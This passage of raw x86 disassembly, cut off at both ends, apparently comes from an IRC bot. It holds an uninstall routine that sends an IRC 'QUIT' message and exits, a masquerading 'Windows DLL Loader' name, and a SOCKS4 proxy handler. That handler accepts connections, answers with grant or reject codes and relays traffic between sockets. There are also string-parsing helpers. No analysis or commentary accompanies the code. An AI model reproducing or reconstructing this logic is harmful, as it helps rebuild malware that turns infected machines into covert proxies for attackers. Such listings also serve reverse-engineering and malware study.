lea eax, [ebp+var_104]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_104]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_4072DB
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
mov eax, [ebp+var_108]
shl eax, 1
push off_418B8C[eax*4]
push 0
call sub_406C51
add esp, 0Ch
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_20C]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
test eax, eax
jz short loc_4072D9
push offset dword_41EAFC
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_40D6CB
pop ecx
pop ecx
call dword_417254 ; WSACleanup
push 0
call dword_41705C ; ExitProcess
loc_4072D9: ; CODE XREF: sub_407148+170�j
jmp short locret_40732B
; ---------------------------------------------------------------------------
loc_4072DB: ; CODE XREF: sub_407148+D8�j
jmp loc_40717A
; ---------------------------------------------------------------------------
loc_4072E0: ; CODE XREF: sub_407148+4F�j
push offset dword_41EAFC
push offset aWindowsDllLoad ; "Windows DLL Loader"
push 0
call sub_406C51
add esp, 0Ch
lea eax, [ebp+var_20C]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
test eax, eax
jz short locret_40732B
push offset dword_41EAFC
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_40D6CB
pop ecx
pop ecx
call dword_417254 ; WSACleanup
push 0
call dword_41705C ; ExitProcess
locret_40732B: ; CODE XREF: sub_407148:loc_4072D9�j
; sub_407148+1C2�j
leave
retn
sub_407148 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40732D proc near ; DATA XREF: sub_40764D+145�o
var_16F0 = dword ptr -16F0h
var_16EC = dword ptr -16ECh
var_16E8 = dword ptr -16E8h
var_16E4 = dword ptr -16E4h
var_16E0 = byte ptr -16E0h
var_6E0 = byte ptr -6E0h
var_5E0 = dword ptr -5E0h
var_5DC = byte ptr -5DCh
var_5D4 = dword ptr -5D4h
var_5D0 = byte ptr -5D0h
var_5CF = byte ptr -5CFh
var_5CE = dword ptr -5CEh
var_5C8 = byte ptr -5C8h
var_1C8 = dword ptr -1C8h
var_1BE = byte ptr -1BEh
var_1AE = byte ptr -1AEh
var_1B = byte ptr -1Bh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 16F0h
call sub_416BC0
push 1BDh
push [ebp+arg_0]
lea eax, [ebp+var_1C8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov eax, [ebp+var_1C8]
mov [ebp+var_5D4], eax
push 0
push 408h
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call dword_417248 ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40738F
cmp [ebp+var_8], 0FFFFFFFFh
jnz short loc_407396
loc_40738F: ; CODE XREF: sub_40732D+5A�j
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_407396: ; CODE XREF: sub_40732D+60�j
movzx eax, [ebp+var_5D0]
cmp eax, 4
jnz short loc_4073BA
movzx eax, [ebp+var_5CF]
cmp eax, 1
jnz short loc_4073BA
mov [ebp+var_16EC], 1
jmp short loc_4073C1
; ---------------------------------------------------------------------------
loc_4073BA: ; CODE XREF: sub_40732D+73�j
; sub_40732D+7F�j
and [ebp+var_16EC], 0
loc_4073C1: ; CODE XREF: sub_40732D+8B�j
mov eax, [ebp+var_16EC]
mov [ebp+var_4], eax
movsx eax, [ebp+var_1BE]
test eax, eax
jz short loc_4073F5
push 10h
lea eax, [ebp+var_1BE]
push eax
lea eax, [ebp+var_5C8]
push eax
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_4073F5
and [ebp+var_4], 0
loc_4073F5: ; CODE XREF: sub_40732D+A6�j
; sub_40732D+C2�j
movsx eax, [ebp+var_1B]
test eax, eax
jz short loc_407456
lea eax, [ebp+var_6E0]
push eax
push [ebp+var_5D4]
call sub_4044F7
pop ecx
pop ecx
cmp [ebp+var_4], 0
jz short loc_407423
mov [ebp+var_16F0], offset byte_41DE00
jmp short loc_40742D
; ---------------------------------------------------------------------------
loc_407423: ; CODE XREF: sub_40732D+E8�j
mov [ebp+var_16F0], offset dword_418EEC
loc_40742D: ; CODE XREF: sub_40732D+F4�j
push [ebp+var_16F0]
movzx eax, [ebp+var_5D0]
push eax
lea eax, [ebp+var_6E0]
push eax
push offset dword_418EB8
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 14h
loc_407456: ; CODE XREF: sub_40732D+CE�j
cmp [ebp+var_4], 0
jnz short loc_4074A0
push 8
push 0
lea eax, [ebp+var_5D0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_5CF], 5Bh
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5D4]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_4074A0: ; CODE XREF: sub_40732D+12D�j
push 0Ah
lea eax, [ebp+var_5DC]
push eax
push [ebp+var_5CE]
call dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 2710h
push 0
lea eax, [ebp+var_5DC]
push eax
push [ebp+var_5CE+2]
call dword_41721C ; inet_ntoa
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_5E0], eax
push 8
push 0
lea eax, [ebp+var_5D0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
cmp [ebp+var_5E0], 0
jnz short loc_407537
mov [ebp+var_5CF], 5Bh
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5D4]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_407537: ; CODE XREF: sub_40732D+1D7�j
mov [ebp+var_5CF], 5Ah
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
loc_407555: ; CODE XREF: sub_40732D+2FD�j
push [ebp+var_5D4]
call sub_40447B
pop ecx
test eax, eax
jz short loc_4075BD
push 0
push 1000h
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5D4]
call dword_417248 ; recv
mov [ebp+var_16E4], eax
cmp [ebp+var_16E4], 0
jz short loc_407597
cmp [ebp+var_16E4], 0FFFFFFFFh
jnz short loc_40759C
loc_407597: ; CODE XREF: sub_40732D+25F�j
jmp loc_40762F
; ---------------------------------------------------------------------------
loc_40759C: ; CODE XREF: sub_40732D+268�j
push [ebp+var_16E4]
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5E0]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_4075BD
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_4075BD: ; CODE XREF: sub_40732D+236�j
; sub_40732D+28C�j
push [ebp+var_5E0]
call sub_40447B
pop ecx
test eax, eax
jz short loc_407622
push 0
push 1000h
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5E0]
call dword_417248 ; recv
mov [ebp+var_16E8], eax
cmp [ebp+var_16E8], 0
jz short loc_4075FF
cmp [ebp+var_16E8], 0FFFFFFFFh
jnz short loc_407601
loc_4075FF: ; CODE XREF: sub_40732D+2C7�j
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_407601: ; CODE XREF: sub_40732D+2D0�j
push [ebp+var_16E8]
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_407622
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_407622: ; CODE XREF: sub_40732D+29E�j
; sub_40732D+2F1�j
push 32h
call dword_41709C ; Sleep
jmp loc_407555
; ---------------------------------------------------------------------------
loc_40762F: ; CODE XREF: sub_40732D:loc_407597�j
; sub_40732D+28E�j ...
push [ebp+var_5D4]
call sub_40538D
pop ecx
push [ebp+var_5E0]
call sub_40538D
pop ecx
xor eax, eax
locret_407649: ; CODE XREF: sub_40732D+64�j
; sub_40732D+16E�j ...
leave
retn 4
sub_40732D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40764D proc near ; DATA XREF: sub_4077DD+B4�o
var_1CC = dword ptr -1CCh
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_1B6 = byte ptr -1B6h
var_1A6 = byte ptr -1A6h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
push 1BDh
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_1BC]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_1C4], eax
cmp [ebp+var_1C4], 0
jnz short loc_4076A8
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4077D9
; ---------------------------------------------------------------------------
loc_4076A8: ; CODE XREF: sub_40764D+46�j
lea eax, [ebp+var_1BC]
push eax
mov eax, [ebp+var_1C0]
push dword ptr [eax]
push offset dword_418EF8
lea eax, [ebp+var_1A6]
push eax
call sub_40D53F
add esp, 10h
loc_4076CB: ; CODE XREF: sub_40764D+B9�j
; sub_40764D+E1�j ...
push 3E8h
push [ebp+var_1C4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1C8], eax
mov eax, [ebp+var_1C0]
cmp dword ptr [eax+4], 0
jnz short loc_4076F8
cmp [ebp+var_1C8], 0
jnz short loc_4076FD
loc_4076F8: ; CODE XREF: sub_40764D+A0�j
jmp loc_4077BF
; ---------------------------------------------------------------------------
loc_4076FD: ; CODE XREF: sub_40764D+A9�j
cmp [ebp+var_1C8], 0FFFFFFFFh
jnz short loc_407708
jmp short loc_4076CB
; ---------------------------------------------------------------------------
loc_407708: ; CODE XREF: sub_40764D+B7�j
push 1BDh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1CC], eax
cmp [ebp+var_1CC], 0
jnz short loc_407730
push [ebp+var_1C8]
call sub_4053B1
pop ecx
jmp short loc_4076CB
; ---------------------------------------------------------------------------
loc_407730: ; CODE XREF: sub_40764D+D3�j
mov eax, [ebp+var_1CC]
mov ecx, [ebp+var_1C8]
mov [eax], ecx
lea eax, [ebp+var_1BC]
push eax
mov eax, [ebp+var_1CC]
add eax, 4
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_1B6]
push eax
mov eax, [ebp+var_1CC]
add eax, 0Ah
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push 1A3h
lea eax, [ebp+var_1A6]
push eax
mov eax, [ebp+var_1CC]
add eax, 1Ah
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_1CC]
push offset sub_40732D
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_4077BA
push [ebp+var_1CC]
call sub_416B4C ; free
pop ecx
push [ebp+var_1C8]
call sub_4053B1
pop ecx
loc_4077BA: ; CODE XREF: sub_40764D+153�j
jmp loc_4076CB
; ---------------------------------------------------------------------------
loc_4077BF: ; CODE XREF: sub_40764D:loc_4076F8�j
push [ebp+var_1C4]
call sub_404CBB
pop ecx
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
locret_4077D9: ; CODE XREF: sub_40764D+56�j
leave
retn 4
sub_40764D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4077DD proc near ; CODE XREF: sub_40A9CF+17A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_40780F
push 0Ah
lea eax, [ebp+var_8]
push eax
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_8]
mov [ebp+arg_4], eax
loc_40780F: ; CODE XREF: sub_4077DD+A�j
push 1BDh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_407825
jmp short locret_40789E
; ---------------------------------------------------------------------------
loc_407825: ; CODE XREF: sub_4077DD+44�j
push [ebp+arg_4]
mov eax, [ebp+var_C]
add eax, 4
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_407844
mov eax, [ebp+arg_8]
mov [ebp+var_10], eax
jmp short loc_40784B
; ---------------------------------------------------------------------------
loc_407844: ; CODE XREF: sub_4077DD+5D�j
mov [ebp+var_10], offset byte_41DE00
loc_40784B: ; CODE XREF: sub_4077DD+65�j
push 10h
push [ebp+var_10]
mov eax, [ebp+var_C]
add eax, 0Ah
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_C]
add eax, 1Ah
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push offset dword_418F2C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_C]
push offset sub_40764D
call sub_4095A4
add esp, 14h
locret_40789E: ; CODE XREF: sub_4077DD+46�j
leave
retn
sub_4077DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078A0 proc near ; CODE XREF: sub_40A9CF+216�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4078B8
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078B8: ; CODE XREF: sub_4078A0+14�j
; sub_4078A0:loc_4078E2�j
cmp [ebp+var_4], 0
jnz short loc_4078C0
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078C0: ; CODE XREF: sub_4078A0+1C�j
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_4078E0
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
jmp short loc_4078E2
; ---------------------------------------------------------------------------
loc_4078E0: ; CODE XREF: sub_4078A0+33�j
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078E2: ; CODE XREF: sub_4078A0+3E�j
jmp short loc_4078B8
; ---------------------------------------------------------------------------
locret_4078E4: ; CODE XREF: sub_4078A0+16�j
; sub_4078A0+1E�j ...
leave
retn
sub_4078A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078E6 proc near ; CODE XREF: sub_407D42+A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_4078FC
; ---------------------------------------------------------------------------
loc_4078F5: ; CODE XREF: sub_4078E6:loc_407921�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4078FC: ; CODE XREF: sub_4078E6+D�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407923
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_407921
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_407921: ; CODE XREF: sub_4078E6+32�j
jmp short loc_4078F5
; ---------------------------------------------------------------------------
loc_407923: ; CODE XREF: sub_4078E6+21�j
mov eax, [ebp+var_8]
leave
retn
sub_4078E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407928 proc near ; CODE XREF: sub_40E618+2B�p
; sub_40E618+185�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_10], 0
jnz short loc_407963
mov eax, [ebp+arg_10]
shl eax, 2
push eax
push 0
push [ebp+arg_8]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
shl eax, 2
push eax
push 0
push [ebp+arg_C]
call sub_416B6A ; memset
add esp, 0Ch
xor eax, eax
jmp locret_407A54
; ---------------------------------------------------------------------------
loc_407963: ; CODE XREF: sub_407928+A�j
push [ebp+arg_0]
push [ebp+arg_4]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push [ebp+arg_0]
call sub_40813C
add esp, 0Ch
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov [eax], ecx
mov [ebp+var_8], 1
jmp short loc_4079A1
; ---------------------------------------------------------------------------
loc_40799A: ; CODE XREF: sub_407928:loc_407A4C�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4079A1: ; CODE XREF: sub_407928+70�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_10]
jge loc_407A51
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+eax*4-4], 0
jz short loc_407A0A
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_8]
mov [edx+ecx*4], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+eax*4], 0
jz short loc_4079F8
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
mov eax, [ecx+eax*4]
sub eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
add ecx, eax
mov [ebp+var_C], ecx
jmp short loc_4079FC
; ---------------------------------------------------------------------------
loc_4079F8: ; CODE XREF: sub_407928+B8�j
and [ebp+var_C], 0
loc_4079FC: ; CODE XREF: sub_407928+CE�j
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
mov edx, [ebp+var_C]
mov [ecx+eax*4], edx
jmp short loc_407A4C
; ---------------------------------------------------------------------------
loc_407A0A: ; CODE XREF: sub_407928+90�j
mov eax, [ebp+arg_10]
sub eax, [ebp+var_8]
shl eax, 2
push eax
push 0
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
lea eax, [ecx+eax*4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
sub eax, [ebp+var_8]
shl eax, 2
push eax
push 0
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
lea eax, [ecx+eax*4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_8]
dec eax
jmp short locret_407A54
; ---------------------------------------------------------------------------
loc_407A4C: ; CODE XREF: sub_407928+E0�j
jmp loc_40799A
; ---------------------------------------------------------------------------
loc_407A51: ; CODE XREF: sub_407928+7F�j
mov eax, [ebp+arg_10]
locret_407A54: ; CODE XREF: sub_407928+36�j
; sub_407928+122�j
leave
retn
sub_407928 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A56 proc near ; CODE XREF: sub_401146+6B�p
; sub_401146+CA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_407A81
cmp ecx, 1
jz short loc_407A7E
loc_407A6E: ; CODE XREF: sub_407A56+26�j
mov al, [esi]
mov [edi], al
test al, al
jz short loc_407A81
inc esi
inc edi
dec ecx
cmp ecx, 1
jnz short loc_407A6E
loc_407A7E: ; CODE XREF: sub_407A56+16�j
mov byte ptr [edi], 0
loc_407A81: ; CODE XREF: sub_407A56+11�j
; sub_407A56+1E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_407A56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A86 proc near ; CODE XREF: sub_4097A7+17�p
; sub_4098F3+17�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_407A97
; ---------------------------------------------------------------------------
loc_407A90: ; CODE XREF: sub_407A86+3A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407A97: ; CODE XREF: sub_407A86+8�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407AC6
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_407AC2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 39h
jg short loc_407AC2
jmp short loc_407A90
; ---------------------------------------------------------------------------
loc_407AC2: ; CODE XREF: sub_407A86+2A�j
; sub_407A86+38�j
xor al, al
jmp short locret_407AC8
; ---------------------------------------------------------------------------
loc_407AC6: ; CODE XREF: sub_407A86+1C�j
mov al, 1
locret_407AC8: ; CODE XREF: sub_407A86+3E�j
leave
retn
sub_407A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407ACA proc near ; CODE XREF: sub_401000+F6�p
; sub_4148CE+61�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push [ebp+arg_8]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
and [ebp+var_8], 0
and [ebp+var_C], 0
jmp short loc_407AED
; ---------------------------------------------------------------------------
loc_407AE6: ; CODE XREF: sub_407ACA:loc_407B58�j
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
loc_407AED: ; CODE XREF: sub_407ACA+1A�j
mov eax, [ebp+arg_4]
sub eax, [ebp+var_4]
cmp [ebp+var_C], eax
jg short loc_407B5A
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_407B37
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
add ecx, 20h
cmp eax, ecx
jz short loc_407B37
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
sub ecx, 20h
cmp eax, ecx
jnz short loc_407B58
loc_407B37: ; CODE XREF: sub_407ACA+3F�j
; sub_407ACA+55�j
push [ebp+var_4]
push [ebp+arg_8]
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_407B58
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
jmp short locret_407B5C
; ---------------------------------------------------------------------------
loc_407B58: ; CODE XREF: sub_407ACA+6B�j
; sub_407ACA+84�j
jmp short loc_407AE6
; ---------------------------------------------------------------------------
loc_407B5A: ; CODE XREF: sub_407ACA+2C�j
xor eax, eax
locret_407B5C: ; CODE XREF: sub_407ACA+8C�j
leave
retn
sub_407ACA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407B5E proc near ; CODE XREF: sub_40A2D2+11D�p
; sub_40E943+20�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_407B70
; ---------------------------------------------------------------------------
loc_407B69: ; CODE XREF: sub_407B5E:loc_407BEE�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407B70: ; CODE XREF: sub_407B5E+9�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407B85
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
jmp short locret_407BF3
; ---------------------------------------------------------------------------
loc_407B85: ; CODE XREF: sub_407B5E+1D�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_407BA1
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_407BEE
loc_407BA1: ; CODE XREF: sub_407B5E+33�j
and [ebp+var_8], 0
jmp short loc_407BAE
; ---------------------------------------------------------------------------
loc_407BA7: ; CODE XREF: sub_407B5E:loc_407BEC�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_407BAE: ; CODE XREF: sub_407B5E+47�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
movsx eax, byte ptr [ecx+eax]
cmp eax, 0Dh
jz short loc_407BD2
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
movsx eax, byte ptr [ecx+eax]
cmp eax, 0Ah
jnz short loc_407BE1
loc_407BD2: ; CODE XREF: sub_407B5E+60�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
and byte ptr [ecx+eax], 0
jmp short loc_407BEC
; ---------------------------------------------------------------------------
loc_407BE1: ; CODE XREF: sub_407B5E+72�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
add eax, [ebp+var_8]
jmp short locret_407BF3
; ---------------------------------------------------------------------------
loc_407BEC: ; CODE XREF: sub_407B5E+81�j
jmp short loc_407BA7
; ---------------------------------------------------------------------------
loc_407BEE: ; CODE XREF: sub_407B5E+41�j
jmp loc_407B69
; ---------------------------------------------------------------------------
locret_407BF3: ; CODE XREF: sub_407B5E+25�j
; sub_407B5E+8C�j
leave
retn
sub_407B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BF5 proc near ; CODE XREF: sub_411A09+5D�p
; sub_411A09+F3�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_407BF8: ; CODE XREF: sub_407BF5:loc_407C28�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_0]
inc ecx
mov [ebp+arg_0], ecx
test eax, eax
jz short loc_407C2A
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407C15
jmp short loc_407C2A
; ---------------------------------------------------------------------------
loc_407C15: ; CODE XREF: sub_407BF5+1C�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407C28
mov eax, [ebp+arg_0]
and byte ptr [eax], 0
jmp short loc_407C2A
; ---------------------------------------------------------------------------
loc_407C28: ; CODE XREF: sub_407BF5+29�j
jmp short loc_407BF8
; ---------------------------------------------------------------------------
loc_407C2A: ; CODE XREF: sub_407BF5+12�j
; sub_407BF5+1E�j ...
pop ebp
retn
sub_407BF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407C2C proc near ; CODE XREF: sub_4083AD+2F2�p
; sub_40CA29+91�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_407C49
; ---------------------------------------------------------------------------
loc_407C42: ; CODE XREF: sub_407C2C+31�j
; sub_407C2C:loc_407CCD�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407C49: ; CODE XREF: sub_407C2C+14�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407C68
cmp [ebp+var_C], 0
jz short loc_407C5F
jmp short loc_407C42
; ---------------------------------------------------------------------------
loc_407C5F: ; CODE XREF: sub_407C2C+2F�j
mov [ebp+var_C], 1
jmp short loc_407C6C
; ---------------------------------------------------------------------------
loc_407C68: ; CODE XREF: sub_407C2C+29�j
and [ebp+var_C], 0
loc_407C6C: ; CODE XREF: sub_407C2C+3A�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
